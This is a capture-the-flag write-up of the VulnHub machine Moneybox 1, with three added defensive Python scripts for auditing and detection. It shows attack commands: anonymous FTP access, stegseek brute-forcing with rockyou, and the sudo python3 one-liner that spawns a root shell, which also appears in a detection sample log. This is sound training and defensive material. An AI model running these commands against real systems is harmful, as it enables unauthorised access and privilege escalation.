Moneybox 1 is an Easy-rated VulnHub machine that doesn't waste your time. The intended path is clean — anonymous FTP, a hidden image with credentials tucked inside via steganography, SSH in, and a sudo misconfiguration that hands you root in one command. I finished it in about an hour and a half, though the steghide passphrase took longer than I'd care to admit.
01_Reconnaissance
Standard nmap sweep to start. Three ports — FTP (21), HTTP (80), and SSH (22). Nothing exotic. The FTP version banner comes back as vsftpd 3.0.3, and nmap's default scripts flag it as allowing anonymous login. That's the thread to pull.
$ sudo nmap -sC -sV -p- --min-rate 5000 192.168.1.12
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 146764 May 01 2021 trytofind.jpg
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: MoneyBox
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2
Key Finding
Anonymous FTP lists a file called trytofind.jpg. The name is a hint from the machine author. Nine times out of ten in Easy VulnHub boxes, if there's an image in an anonymous FTP share — check it for steganography.
02_FTP_Enumeration
Anonymous FTP is one of those vulnerabilities that shouldn't exist on anything facing an untrusted network, but here we are. Logged in as anonymous with no password, grabbed the image, and disconnected. Two commands.
$ ftp 192.168.1.12
Connected to 192.168.1.12.
220 (vsFTPd 3.0.3)
Name (192.168.1.12:kali): anonymous
Password: [blank]
230 Login successful.
ftp> ls
-rw-r--r-- 1 0 0 146764 May 01 2021 trytofind.jpg
ftp> get trytofind.jpg
226 Transfer complete.
ftp> bye
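The fix on the server side is a two-line change in vsftpd.conf, but it is easy to miss because vsftpd enables anonymous logins when the key is absent. The auditor below is an added example written for this write-up, not code from the box or from the vsftpd project: it parses a config, reports every directive that differs from the hardened value, and emits a corrected copy. The directive names are real vsftpd keys; the sample config is constructed.

```python
# Added example (not from the write-up): audit a vsftpd.conf for the
# anonymous-access settings that made trytofind.jpg reachable, and emit a
# hardened copy. SAMPLE_CONF is constructed, not the box's real config.
import re

# Real vsftpd.conf directives and the value a hardened server should carry.
SAFE_VALUES = {
    "anonymous_enable": "NO",          # no anonymous logins at all
    "anon_upload_enable": "NO",        # never let anonymous users write
    "anon_mkdir_write_enable": "NO",
    "write_enable": "NO",              # read-only unless uploads are required
}

SAMPLE_CONF = """\
# constructed vsftpd.conf resembling an easy CTF box
listen=YES
anonymous_enable=YES
local_enable=YES
write_enable=YES
anon_upload_enable=NO
dirmessage_enable=YES
"""


def parse_conf(text):
    """Return {key: value} for uncommented key=value lines (vsftpd syntax)."""
    settings = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep:
            settings[key.strip()] = value.strip()
    return settings


def audit_vsftpd(text):
    """List (directive, current, expected) for every unsafe setting.

    vsftpd defaults anonymous_enable to YES when the key is absent, so a
    missing key is reported as effectively YES; the other keys default to NO.
    """
    settings = parse_conf(text)
    defaults = {"anonymous_enable": "YES"}
    findings = []
    for key, safe in SAFE_VALUES.items():
        current = settings.get(key, defaults.get(key, "NO")).upper()
        if current != safe:
            findings.append((key, current, safe))
    return findings


def harden(text):
    """Rewrite the config so every audited directive carries its safe value,
    appending directives that were missing. All other lines are kept verbatim."""
    out, seen = [], set()
    for line in text.splitlines():
        m = re.match(r"\s*([A-Za-z_]+)\s*=", line)
        key = m.group(1) if m else None
        if key in SAFE_VALUES:
            out.append(f"{key}={SAFE_VALUES[key]}")
            seen.add(key)
        else:
            out.append(line)
    for key, safe in SAFE_VALUES.items():
        if key not in seen:
            out.append(f"{key}={safe}")
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    for key, current, safe in audit_vsftpd(SAMPLE_CONF):
        print(f"{key}={current}  -> should be {safe}")
    print(harden(SAMPLE_CONF))
```

Run against the constructed config it reports anonymous_enable and write_enable; the hardened output also appends anon_mkdir_write_enable=NO so a later change of defaults cannot silently reopen the share.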
03_Web_Enumeration
While stegseek ran in the background, I hit the web server. Port 80 shows a basic landing page with the "MoneyBox" branding — nothing in the visible content, but the source was worth a look. Gobuster turned up a /blogs directory pretty quickly.
$ gobuster dir -u http://192.168.1.12 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
/index.html     (Status: 200) [Size: 1234]
/blogs          (Status: 301) [Size: 313]
/server-status  (Status: 403) [Size: 277]
Navigating to http://192.168.1.12/blogs and viewing the page source reveals a commented-out hint. The developer left a username sitting in an HTML comment — the kind of thing that gets flagged immediately in a real engagement.
# view-source:http://192.168.1.12/blogs/index.html
<!-- the hint is -> user: renu -->
OSINT Note
Credentials left in HTML comments are a real vulnerability class — I've seen client engagements where staging credentials ended up in commented-out form fields. Always check the source of every page, especially anything with a login or registration form nearby.
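The same check belongs on the developer's side of the fence, before the page ships. The script below is an added example (not from the write-up): a pre-release lint that parses HTML with the standard library, collects every comment with the line it starts on, and reports the ones that look like they carry a username, password or key. The keyword list and the sample page are constructed; the hint line mirrors the one found on /blogs.

```python
# Added example (not part of the write-up): a pre-deployment check that
# reports HTML comments containing credential-looking content, such as the
# "user: renu" hint left in /blogs. SAMPLE_PAGE is constructed.
import re
from html.parser import HTMLParser

# Constructed list of labels a reviewer would not want to ship in a comment.
SENSITIVE = re.compile(
    r"\b(user(name)?|login|pass(word|wd|code)?|secret|token|api[_-]?key)\b\s*[:=]",
    re.IGNORECASE,
)


class CommentCollector(HTMLParser):
    """Collect every HTML comment together with the line on which it starts."""

    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        # getpos() reports the position of the token currently being handled.
        line, _col = self.getpos()
        self.comments.append((line, data.strip()))


def find_sensitive_comments(html):
    """Return [(line, comment_text)] for comments matching SENSITIVE."""
    parser = CommentCollector()
    parser.feed(html)
    parser.close()
    return [(ln, c) for ln, c in parser.comments if SENSITIVE.search(c)]


SAMPLE_PAGE = """<!DOCTYPE html>
<html>
<head><title>MoneyBox</title></head>
<body>
<!-- layout wrapper -->
<h1>Blogs</h1>
<!-- the hint is -> user: renu -->
<form action="/login">
  <!-- TODO remove before release: password=example-placeholder -->
</form>
</body>
</html>
"""

if __name__ == "__main__":
    for line, comment in find_sensitive_comments(SAMPLE_PAGE):
        print(f"line {line}: <!-- {comment} -->")
```

Wired into CI over the template directory, a non-empty result fails the build; the innocuous "layout wrapper" comment passes, the two credential-shaped ones do not.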
04_Steganography
Back to the image. Steghide needs a passphrase — stegseek automates the brute force against rockyou.txt. Took maybe two minutes. The extracted file is passcode.txt, which contains the SSH password for user renu.
$ stegseek trytofind.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "[REDACTED]"
[i] Original filename: "passcode.txt"
[i] Extracting to "trytofind.jpg.out"
$ cat trytofind.jpg.out
[REDACTED]
I tried steghide directly before stegseek and kept guessing common passwords manually — password, moneybox, the machine name. Wasted fifteen minutes. Just use stegseek from the start.
05_SSH_Initial_Access
Username from the web comment, password from the image. SSH in and grab the user flag from the home directory.
$ ssh renu@192.168.1.12
renu@192.168.1.12's password: [REDACTED]
renu@MoneyBox:~$ ls
user.txt
renu@MoneyBox:~$ cat user.txt
[REDACTED]
06_PrivEsc_via_Sudo_Python3
First thing I check after landing a shell — sudo -l. The output here is about as generous as it gets: renu can run /usr/bin/python3 as root with no password. GTFObins has the exact one-liner for this.
renu@MoneyBox:~$ sudo -l
Matching Defaults entries for renu on MoneyBox:
    env_reset, mail_badpass, secure_path=...
User renu may run the following commands on MoneyBox:
    (ALL) NOPASSWD: /usr/bin/python3

# GTFObins — sudo python3 shell escape
renu@MoneyBox:~$ sudo python3 -c 'import os; os.system("/bin/sh")'
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
[REDACTED]
Technique Note — GTFObins
Any scripting language runnable via sudo NOPASSWD is effectively a root shell. Because sudo starts python3 as root, the shell that os.system() spawns inherits root's uid. The same applies to perl, ruby, lua, node — if it can exec, it can escalate. Reference: GTFObins/python.
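Two things a defender wants from this section: a way to catch the rule before it ships, and a way to see the escalation when it happens. The script below is an added example (not from the write-up, and not a sudo project tool) that does both: it audits sudoers-style rules for entries granting ALL or a shell-capable binary, flagging NOPASSWD, and scans auth.log for sudo COMMAND= entries that invoke such a binary as another user. The rules and log lines are constructed; the log regex assumes sudo's default syslog line format, and SHELL_CAPABLE is a partial list chosen by me, not GTFOBins' full index.

```python
# Added example (not from the write-up): audit sudoers rules for NOPASSWD
# grants of shell-capable binaries, and flag their use in auth.log.
# SAMPLE_SUDOERS and SAMPLE_AUTH_LOG are constructed; SUDO_LOG assumes the
# default "sudo: user : TTY=... ; USER=... ; COMMAND=..." syslog format.
import re

# Partial, hand-picked list of binaries that can exec a shell; any of these
# under sudo is equivalent to root.
SHELL_CAPABLE = {
    "python", "python2", "python3", "perl", "ruby", "lua", "node",
    "sh", "bash", "dash", "zsh", "vi", "vim", "less", "more", "find", "awk",
}

# user  host=(runas) TAG: cmd, cmd ...
SUDOERS_RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:\w+:\s*)*)"
    r"(?P<cmds>.+)$"
)

SKIP_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")


def audit_sudoers(text):
    """Return (user, command, reason) for every rule that grants ALL or a
    shell-capable binary; NOPASSWD is appended to the reason when present."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop trailing comments
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = SUDOERS_RULE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags").replace(" ", "")
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            path = cmd.split()[0]
            base = path.rsplit("/", 1)[-1]
            if path == "ALL" or base in SHELL_CAPABLE:
                reason = "ALL" if path == "ALL" else "shell-capable binary"
                if nopasswd:
                    reason += ", NOPASSWD"
                findings.append((m.group("user"), path, reason))
    return findings


SUDO_LOG = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:\s+.*?USER=(?P<runas>\S+)\s+;\s+COMMAND=(?P<cmd>.+)$"
)


def detect_sudo_interpreters(lines):
    """Return (user, runas, command) for sudo COMMAND= entries whose binary is
    shell-capable; these are the events an alert should fire on."""
    hits = []
    for line in lines:
        m = SUDO_LOG.search(line)
        if not m:
            continue
        binary = m.group("cmd").split()[0].rsplit("/", 1)[-1]
        if binary in SHELL_CAPABLE:
            hits.append((m.group("user"), m.group("runas"), m.group("cmd")))
    return hits


SAMPLE_SUDOERS = """\
Defaults env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
renu    ALL=(ALL) NOPASSWD: /usr/bin/python3        # the MoneyBox rule
backup  ALL=(root) NOPASSWD: /usr/local/bin/run-backup.sh
ops     ALL=(ALL) /usr/bin/systemctl restart apache2, /usr/bin/vim
"""

SAMPLE_AUTH_LOG = [
    "May  1 13:02:11 MoneyBox sudo:     renu : TTY=pts/0 ; PWD=/home/renu ; USER=root ; COMMAND=list",
    'May  1 13:02:40 MoneyBox sudo:     renu : TTY=pts/0 ; PWD=/home/renu ; USER=root ; COMMAND=/usr/bin/python3 -c import os; os.system("/bin/sh")',
    "May  1 13:05:02 MoneyBox sudo:   backup : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/local/bin/run-backup.sh",
    "May  1 13:06:30 MoneyBox sshd[1201]: Accepted password for renu from 192.168.1.5 port 50222 ssh2",
]

if __name__ == "__main__":
    for user, cmd, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"sudoers: {user} -> {cmd} ({reason})")
    for user, runas, cmd in detect_sudo_interpreters(SAMPLE_AUTH_LOG):
        print(f"auth.log: {user} ran as {runas}: {cmd}")
```

The backup rule passes the audit because it names a fixed script rather than an interpreter, which is the shape the renu grant should have had: sudo a wrapper script with a specific job, not /usr/bin/python3 itself.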
07_Attack_Chain_Summary
- 01 Nmap → ports 21 (FTP anon), 80 (HTTP), 22 (SSH)
- 02 Anonymous FTP login → download trytofind.jpg
- 03 Gobuster → /blogs directory discovered
- 04 /blogs page source → HTML comment reveals username: renu
- 05 stegseek trytofind.jpg rockyou.txt → extracts passcode.txt with SSH password
- 06 SSH as renu → user.txt
- 07 sudo -l → (ALL) NOPASSWD: /usr/bin/python3
- 08 sudo python3 GTFObins one-liner → ROOT → root.txt